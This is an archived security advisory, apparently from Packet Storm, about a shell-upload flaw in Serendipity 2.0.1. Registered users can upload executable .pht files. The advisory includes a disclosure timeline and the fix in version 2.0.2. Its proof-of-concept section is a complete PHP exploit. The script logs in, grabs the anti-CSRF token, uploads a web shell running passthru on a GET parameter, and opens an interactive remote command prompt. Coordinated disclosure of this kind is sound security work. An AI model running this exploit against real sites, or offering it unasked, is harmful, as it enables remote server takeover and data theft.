what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Serendipity 2.0.1 Shell Upload

Serendipity 2.0.1 Shell Upload
Posted Sep 1, 2015
Authored by Tim Coen | Site curesec.com

Serendipity version2.0.1 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 671892062ef4118fe83fbe5821d80b6695057fb12b4ba258267f753e16a9d587

Serendipity 2.0.1 Shell Upload

Change Mirror Download
Serendipity 2.0.1: Code Execution
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Serendipity 2.0.1
Fixed in: 2.0.2
Fixed Version Link:
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

Vendor Contact: serendipity@supergarv.de
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 07/21/2015
Disclosed to public: 09/01/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Vulnerability Description
Serendipity 2.0.1 does not allow the upload of .php, .php4, .php5,
.phtml files, or files starting with a dot - eg .htaccess files.

However, files with extension .pht can be uploaded by registered users,
and will be executed by most default Apache configurations.

The file upload is located here:
http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

User registration either requires an admin to create the user, or the
plugin serendipity_plugin_adduser being activated. The default setting
for this plugin does not require an admin to accept the registration of
that user.

3. Proof of Concept


#!/usr/local/bin/php
<?php
if (count($argv) != 8 && count($argv) != 7) {
help($argv);
exit;
}
$cookieJar = tempnam('/tmp', 'cookie');
$user = $argv[1];
$pass = $argv[2];
$rootURL = $argv[3];
$loginURL = $argv[3] . '/' . $argv[4];
$uploadFormURL = $rootURL . '/' . $argv[5];
$shellFileName = $argv[6];

if (count($argv) == 7) {
$shellURL = $rootURL . '/uploads/' . basename($shellFileName);
} else {
$shellURL = $rootURL . '/' . $argv[7];
}

// login
echo "logging in as $user\n";
if (!login($loginURL, array(
"serendipity[user]" => $user,
"serendipity[pass]" => $pass,
"submit" => "Login"))) {
echo "could not log in\n";
exit;
}
echo "login done\n";

// csrf token
echo "getting anti CSRF token\n";
$nonce = getCSRFToken($uploadFormURL, $cookieJar);
echo "token: $nonce\n";

// uploading
echo "uploading $shellFileName to $shellURL\n";
$file = upload($uploadFormURL, $shellFileName,
"serendipity[userfile][1]", array(
"serendipity[token]" => $nonce,
"serendipity[action]" => "admin",
"serendipity[adminModule]" => "media",
"serendipity[adminAction]" => "add",
"serendipity[column_count][1]" => "true",
"serendipity[all_authors]" => "true",
"serendipity[imageimporttype]" => "image",
"serendipity[target_filename][]" => "",
"serendipity[target_directory][]" => ""), $cookieJar);
if ($file == false) {
echo "could not upload (possibly wrong extension? Only .pht is
allowed)\n";
exit;
}
echo "upload done\n";

// executing
echo "starting execution\n";
execute($shellURL, 'exec');

function help($argv) {
echo "usage: php " . $argv[0] . " [user] [pass] [root url] [login
path] [upload form path] [local shell file (pht), should contain <?php
passthru(\$_GET['exec']);] [shell path (optional, in case upload path is
non-standard)]\n
example: php " . $argv[0] . " admin admin http://localhost/serendipity
serendipity_admin.php
serendipity_admin.php?serendipity[adminModule]=media ./404.pht\n";
}

function upload($URL, $fileName, $fileFieldName, $additionalPost,
$cookieJar) {
$fileNameAbsolute = realpath($fileName);
$post = array($fileFieldName => '@' . $fileNameAbsolute);
$post = array_merge($post, $additionalPost);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $URL);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);
$result = curl_exec($ch);

$success = strpos($result, "successfully uploaded as") !== false;
$tmp = preg_match("/successfully uploaded as (.*?)<\/span>/s",
$result, $matches);
curl_close($ch);
return $success ? $matches[1] : false;
}

function get($URL, $cookieJar = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $URL);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

function login($URL, $post) {
global $cookieJar;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $URL);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);
$content = curl_exec($ch);
$success = strpos($content, "Logged in as") !== false;
curl_close($ch);
return $success;
}

function getCSRFToken($URL, $cookieJar) {
$content = get($URL, $cookieJar);
$tmp = preg_match("/input type=\"hidden\"
name=\"serendipity\[token\]\" value=\"(.*?)\" \//s", $content, $matches);
return $matches[1];
}

function execute($shellURL, $argsName) {
while (true) {
$line = readline("$: ");
if ($line == "quit" || $line == "exit") {
exit;
}
echo get($shellURL . "?" . $argsName . "=" . urlencode($line));
}
}

4. Code


The relevant function checking file extensions:
/include/functions_images.inc.php:16

function serendipity_isActiveFile($file) {
if (preg_match('@^\.@', $file)) {
return true;
}

$core =
preg_match('@\.(php.*|[psj]html?|aspx?|cgi|jsp|py|pl)$@i', $file);
if ($core) {
return true;
}

$eventData = false;
serendipity_plugin_api::hook_event('backend_media_check',
$eventData, $file);
return $eventData;
}

5. Solution
To mitigate this issue please upgrade at least to version 2.0.2:

https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

Please note that a newer version might already be available.

5. Report Timeline

07/21/2015 Informed Vendor about Issue
07/24/2015 Vendor releases Version 2.0.2
09/01/2015 Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/Serendipity-201-Code-Execution-48.html


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close